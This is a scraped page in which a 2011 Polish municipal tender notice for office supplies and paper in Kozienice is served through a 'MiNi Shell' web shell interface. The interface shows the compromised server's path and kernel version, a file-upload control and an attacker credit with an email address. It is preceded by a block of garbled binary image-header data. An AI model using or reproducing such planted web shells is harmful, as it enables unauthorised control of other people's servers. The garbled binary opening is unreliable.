JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110203/40371-N-2011.html

<p class="kh_header"><b>Kozienice: Dostawa materiałów biurowych i papieru dla Urzędu Miejskiego w Kozienicach</b><br>
<b>Numer ogłoszenia: 40371 - 2011; data zamieszczenia: 03.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i papieru dla Urzędu Miejskiego w Kozienicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.Zamówienie dotyczy dostawy poszczególnych asortymentów przedmiotu zamówienia zgodnie z bieżącym zapotrzebowaniem Zamawiającego. 
2.Materiały podane w treści opisu przedmiotu zamówienia nie są bezwzględnie obowiązujące, dopuszcza się artykuły równoważne jakością lub lepsze.
3.Towar uważa się za dostarczony, jeżeli będzie dowieziony, złożony w miejscu wskazanym przez Zamawiającego, przeliczony i sprawdzony w obecności Zamawiającego i Wykonawcy oraz potwierdzony na dokumencie dostawy przez Zamawiającego.



     
   .Lp.	Przedmiot zamówienia	



Ilość szt. 
1.		2.		3.		4.		5.	
 1.	Notatnik z wyrywanymi kartkami 
A-4 - 100 kartek	30192000-1	szt.	120
2.	Notatnik z wyrywanymi kartkami
 A-5 - 100 kartek	30192000-1	szt.	50
  3.	Cienkopisy typu STABILO (czarny, czerwony, niebieski, zielony) grubość linii  0,4 mm	30192125-3	szt.	300
  4.	Długopisy typu PENTEL  żelowe*	30192121-5	szt.	500
5.	Długopisy typu PENAC
RB-085	30192123-9	szt.	250
6.	Długopis typu S-FINE  059 	30192123-9	szt.	500
7.	Długopis z przymocowaniem do blatu typu Luxus	30192123-9	szt.	200
8.	Długopis typu BIG CRISTAL medium	30192123-9	szt.	500
9.	Grzbiety do bindownicy   Nr  10,14,16,,20,25,28.	30192000-1	op.	6
10.	Gumki ołówkowe typu PENTEL	30192100-2	szt.	200
11.	Koszulki do segregatorów  A-4 groszkowa 
48 mikronów 
1 opak. - 100 szt.	30192000-1	op.	100
12.	Koszulki z perforacją do wpinania A-4	30192000-1	szt.	500
13.	Klej w sztyfcie 25 g.  typu HINOL	30192000-1	szt.	400
14.	Korektor w taśmie 	30192160-0	szt.	100
15.	Korektor w płynie	30192160-0	szt.	100
16.	Koperty białe pakowane po 250 szt B-4 samoprzylepne	30199230-1	op.	4
17.	Koperty białe C-6 samoprzylepne pakowane po 1000 szt.	30199230-1	op.	40
18.	Koperty białe C-5 samoprzylepne pakowane po 500 szt.	30199230-1	op.	10
19.	Koperty białe C-4 samoprzylepne pakowane po 250 szt.	30199230-1	op.	8
20.	Koperta bąbelkowa propac  A - 5	30199230-1	szt.	500
21.	Koperta CD NK biała	30199230-1	szt.	200
22.	Kostka kolorowa samoprzylepna	30192000-1	szt.	400
23.	Kostka kolorowa	30192000-1	szt.	300
24.	Klamry klipy 51 mm w opakowaniu 12 szt.	30197110-0	op.	15
25.	Klamry klipy 41 mm w opakowaniu 12 szt.	30197110-0	op.	10
26.	Klamry klipy 32 mm w opakowaniu  12 szt.	30197110-0	op.	10
27.	Klamry klipy 25 mm w opakowaniu 12 szt	30197110-0	op.	25
28.	Klamry klipy 19 mm w opakowaniu 12 szt.	30197110-0	op.	20
29.	Klamry klipy 15 mm w opakowaniu 12 szt.	30197110-0	op.	10
30.	Linijka 30 cm plastikowa kolorowa	30192000-1	szt.	50
31.	Zakreślacz typu  DONAU  kolorowy	30192000-1	szt.	80
32.	Marker typu PENTEL wodoodporny-czarny 	30192000-1	szt.	150
33.	Marker CD/DVD  M854 czarny 	30192000-1	szt.	50
34.	Ofertówka A-4	30192500-6	szt.	500
35.	Ołówek zwykły 2B	30192130-1	szt.	300
36.	Ołówek automat typu PENAC  RB-085M	30192131-8	szt.	200
37.	Spinacze biurowy 28 mm opakowanie 
100 szt.	30197220-4	op.	300
38.	Spinacze 50 mm opakowanie 100 szt	30197220-4	op.	100
39.	Skoroszyty plastikowe sztywne kolorowe A-4	30197210-1	szt.	500
40.	Skoroszyty plastikowy sztywny  z europerforacją kolorowy A-4	30197210-1	szt.	500
41.	Skoroszyty do segre- gatorów papierowe gramatura 300 g.	30197210-1	szt.	500
42	Skoroszyt papierowy gramatura 300g	30197210-1	Szt	1000
43.	Segregatory A-4 szer. 
7cm oklejane polipropylenem a wewnątrz karton  różne kolory z wymienną kartą opisową 	30199500-5	
szt.	500
44.	Segregatory A-4 szer
 5 cm  laminowane różne kolory z wymienną kartą opisową	30199500-5	szt.	200
45.	Segregator PP Panorama biały 
A4  4DR 50 typu ESSELTE	30199500-5	szt.	30
46.	Segregator PP Panorama biały 
A4 4R 25MM typu ESSELTE	30199500-5	szt.	30
47.	Sznurek jutowy 10DKG	30197000-6	szt.	130
48.	Teczki z gumką biała gramatura 300g	30197610-5	szt.	500
49.	Teczka wiązana biała gramatura 300 g	30197610-5	szt.	2000
50.	Taśma do maszyna licz. (57) Rolka Dalton	30145100-8	szt.	500
51.	Taśma biurowa samoklejąca przezroczysta 18x10	22853000-4	szt.	100
52.	Wkłady do ołówków typu PENAC RB -085M (grafit) 0,5	30192132-5	szt.	100
53.	Wkłady do długopisów typu PENTEL żelowe (niebieski, czarny)	30192000-1	szt.	100
54.	Wkłady  zwykłe	30192000-1	szt.	100
55.	Wkłady do długopisów PENACnieb , czarny	30192000-1	szt.	100
56.	Zszywki 24/6 opakowanie 1000 szt.	30197100-7	op.	200
57.	Zeszyt B-5 160 kart. (kratka) - twarda oprawa	30192000-1	szt.	20
58.	Zeszyt A-5 96                   (twarda opr.)	30192000-1	szt.	150
59.	Zeszyt A-5 16 kart.   	30192000-1	szt.	100
60.	Zeszyt A-5 32 kart.	30192000-1	szt.	50
61.	Zeszyt  A-4 96 kart. Twarda oprawa	30192000-1	szt.	70
62.	Zszywacz typu H 400 LACO	30197320-5	szt.	25
63.	Wąsy skoroszytowe	30192000-1	szt.	250
64.	Papier A-4  500 A4 80g m typu Pollux Klasa B , Białość CIE 161 Jasność D 65 z UV% 110?2 Wilg. 3,0 - 5,0% , Grubość ?m 104?3 ,Nieprzezroczystość 92 %, Gładkość cm3 1min 220?60
Dołączyć specyfikację papieru Xero	3019764
4-2	Ryza	2000
65.	Papier A-3  500 A3 80g m jakość j.w.	30197644-2	Ryza	150
66.	Papier A-5 500 A5 80g m jakość j.w.	30197644-2	Ryza	100
67.	Karton wizytówkowy 
A-4 gramatura 230g m2	30199310-6	szt.	1000
68.	Dziurkacz SAX 518
(do 30 szt. kartek)	30197330-8	szt.	30
		RAZEM	X.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Do wysokości 20% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.76.44-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	stosowane Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
b)	dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, ul. Parkowa 5 , 26-900 Kozienice, pok. nr 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, ul, Parkowa 5 26-900 Kozienice, pok. 111 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com